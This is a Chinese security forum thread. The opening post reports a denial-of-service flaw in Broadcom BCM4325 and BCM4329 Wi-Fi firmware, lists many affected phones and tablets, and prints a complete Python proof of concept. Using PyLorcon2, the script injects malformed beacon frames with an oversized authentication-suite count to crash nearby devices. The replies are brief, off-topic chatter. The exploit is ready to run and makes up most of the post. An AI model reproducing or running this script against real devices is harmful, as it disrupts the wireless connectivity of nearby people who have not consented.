查看: 2526|回复: 25

Broadcom网卡芯片BCM4325、BCM4329拒绝服务漏洞

[复制链接]
发表于 2012-11-9 03:27:09 | 显示全部楼层 |阅读模式
此次出现漏洞的是Broadcom的无线网卡固件,型号为BCM4325和BCM4329,攻击者可以通过发送特定的无线网络数据包导致拒绝服务攻击。

主要影响的设备有:


    BCM4325

      Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HTC Droid Incredible Samsung Spica Acer Liquid Motorola Devour
    • Ford Edge (yes, it’s a car)
    BCM4329

      Apple iPhone 4 Apple iPhone 4 Verizon Apple iPod 3G Apple iPad Wi-Fi Apple iPad 3G Apple iPad 2 Apple Tv 2G Motorola Xoom Motorola Droid X2 Motorola Atrix Samsung Galaxy Tab Samsung Galaxy S 4G Samsung Nexus S Samsung Stratosphere Samsung Fascinate HTC Nexus One HTC Evo 4G HTC ThunderBolt HTC Droid Incredible 2 LG Revolution Sony Ericsson Xperia Play Pantech Breakout Nokia Lumina 800 Kyocera Echo
    • Asus Transformer Prime
    • Malata ZPad

可以看到苹果三星都在其中,估计影响的范围是比较大的。漏洞由Andres Blanco发现,Core Impact team的 Andres BlancoMatias Eissler写出了漏洞的POC,POC如下:

本POC在python开源库 library LorconPyLorcon2下实现

​

1
------------------------- poc.py -------------------------

2
#!/usr/bin/env python

3

4
import sys

5
import time

6
import struct

7
import PyLorcon2

8

9
def beaconFrameGenerator():

10
    sequence = 0

11
    while(1):

12
        sequence = sequence % 4096

13

14
        # Frame Control

15
        frame  = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon

16
        frame += '\x00' # Flags: 0

17
        frame += '\x00\x00' # Duration: 0

18
        frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff

19
        frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad

20
        frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad

21
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:

22
part of the generator

23
        # Frame Body

24
        frame += struct.pack('Q', time.time()) # Timestamp

25
        frame += '\x64\x00' # Beacon Interval: 0.102400 seconds

26
        frame += '\x11\x04' # Capability Information: ESS, Privacy,

27
Short Slot time

28
        # Information Elements

29
        # SSID: buggy

30
        frame += '\x00\x05buggy'

31
        # Supported Rates: 1,2,5.5,11,18,24,36,54

32
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'

33
        # DS Parameter Set: 6

34
        frame += '\x03\x01\x06'

35
        # RSN IE

36
        frame += '\x30' # ID: 48

37
        frame += '\x14' # Size: 20

38
        frame += '\x01\x00' # Version: 1

39
        frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP

40
        frame += '\x01\x00' # Pairwise cipher suite count: 1

41
        frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP

42
        frame += '\xff\xff' # Authentication suites count: 65535

43
        frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK

44
        frame += '\x00\x00'

45

46
        sequence += 1

47
        yield frame

48

49
if __name__ == "__main__":

50
    if len(sys.argv) != 2:

51
        print "Usage:"

52
        print "\t%s <wireless interface>" % sys.argv[0]

53
        sys.exit(-1)

54

55
    iface = sys.argv[1]

56
    context = PyLorcon2.Context(iface)

57
    context.open_injmon()

58

59
    generator = beaconFrameGenerator()

60

61
    for i in range(10000):

62
        frame = generator.next()

63
        time.sleep(0.100)

64
        context.send_bytes(frame)



发表于 2012-11-21 22:34:49 | 显示全部楼层
真的有么  
发表于 2012-11-22 20:01:01 | 显示全部楼层
挺好啊  
发表于 2012-11-23 06:12:06 | 显示全部楼层
我是来收集资料滴...  
发表于 2014-11-4 22:20:17 | 显示全部楼层
希望大家帮我把这个帖发给你身边的人,谢谢!  
发表于 2014-11-17 17:56:53 | 显示全部楼层
楼主的内容不管你信不信,反正我信了
发表于 2014-12-5 05:16:12 | 显示全部楼层
不错啊! 一个字牛啊!  
发表于 2014-12-28 10:11:59 | 显示全部楼层
支持你就顶你  
发表于 2015-1-28 06:16:12 | 显示全部楼层
去市场买东西,杀价先杀四分之三,现在杀一半行不通了。  
发表于 2015-3-2 04:05:46 | 显示全部楼层
不错不错.,..我喜欢  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则